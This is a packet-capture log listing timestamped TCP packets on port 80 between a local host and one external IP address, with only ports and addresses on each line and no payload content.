Dec 19, 2024 08:47:31.750792980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.750808001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.751110077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.751537085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.752012968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.752075911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.752356052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.753088951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.753146887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.753381968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.753391027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.753526926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.754115105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.754534960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.754576921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.754703045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.755027056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.755110025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.755543947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.755553007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.755609035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.756285906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.756505966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.756550074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.757112026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.757309914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.757359982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.757915020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.758209944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.758275986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.758663893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.759021997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.759174109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.759495020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.759695053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.759793043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.760246992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.760508060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.760576963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.761097908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.761501074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.761555910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.761940956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.762496948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.762561083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.762727976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.762762070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.762861967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.763413906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.763955116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.764029026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.764264107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.764271975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.764328003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.765036106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.765899897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.765918016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.765949011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.766180038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.766298056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.766640902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.766861916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.766959906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.767433882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.767471075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.768203020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.768218994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.768265009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.768546104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.768657923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.768956900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.769382954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.769447088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.769814968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.769824028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.769881964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.770554066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.770800114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.770869970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.771469116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.771477938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.771601915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.772156954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.772358894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.772416115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.772926092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.773153067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.773231983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.773715973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.773881912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.773943901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.774501085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.825293064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.923052073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.923188925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.923294067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.924681902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.925451040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.925461054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.925570965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.926151991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.926166058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.926227093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.926398993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.926475048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.926764011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.926781893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.926860094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.927530050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.927550077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.927628040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.927881002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.928248882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.928256989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.928306103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.928734064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.928800106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.929167032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.929176092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.929235935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.929815054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.930202961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.930211067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.930269003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.930833101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.930948019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.931197882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.931596994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.931605101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.931659937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.932280064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.932326078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.932770014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.933065891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.933165073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.933254957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.935962915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.936043978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.936141014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.936501026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.936583042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.936810970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.937167883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.937453985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.937505960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.937948942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.937958002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.938030005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.938680887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.938751936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.938988924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.939476013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.939560890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.939671040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.940274954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.940407991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.940864086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.941150904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.941159964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.941391945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.941869974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.941996098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.942715883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.942727089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.942804098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.943048000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.943440914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.943545103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.944027901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.944299936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.944308043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.944360018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.945034981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.945110083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.945271969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.945861101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.945924044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.946197033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.946628094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.946763039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.946829081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.947475910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.947590113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.947628975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.948204041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.948290110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.948548079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.949011087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.949143887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.949321985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.949851990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.949903011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.950072050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.950563908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.950615883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.950754881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.951399088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.951512098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.951567888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.952142000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.952256918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.952394009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.952929974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.952994108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.953217983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.953716993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.953780890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.954538107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.954546928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.954652071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.954885006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.955363989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.955421925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.955796957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.956094027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.956321955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.956377983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.956898928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.956954002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.957122087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.957675934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.957806110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.957972050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.958506107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.958633900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.959183931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.959410906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.959419966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.959503889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.960078955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.960186958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.960819006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.961056948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.961066008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.961108923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.961659908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.961745977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.962198019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.962481976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.962491035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.962610960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.963241100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.963310003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.963437080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.964133978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.964236975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.964507103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.964833975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.964900017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.965189934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.965626001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.965719938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.966212988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.966411114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.966495037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.966849089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.012789965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.115459919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.115650892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.115668058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.115729094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.116347075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.116398096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.116637945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.116656065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.116767883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.117294073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.118149996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.118223906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.118522882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.118782043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.118798018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.118830919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.119467974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.119482994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.119529963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.120120049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.120163918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.120672941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.120873928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.120917082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.121227980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.121573925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.121701956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.121956110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.122267962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.122319937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.122741938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.123307943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.123353004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.123565912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.123581886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.123609066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.124339104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.124526978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.124593019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.125163078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.125339985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.125390053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.128065109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.128273010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.128319025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.128602028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.128966093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.129013062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.129319906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.129688978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.129738092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.130058050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.130073071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.130120993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.130882978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.131107092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.131145000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.131622076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.131839037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.131901979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.132392883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.132824898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.132867098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.133245945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.133383036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.133488894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.133995056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.134711027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.134753942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.134938955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.134954929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.135016918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.135679007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.135695934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.135768890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.136406898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.136779070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.136814117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.137152910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.137341976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.137388945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.138019085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.138250113 CET	80	49707	194.87.47.113	192.168.2.7
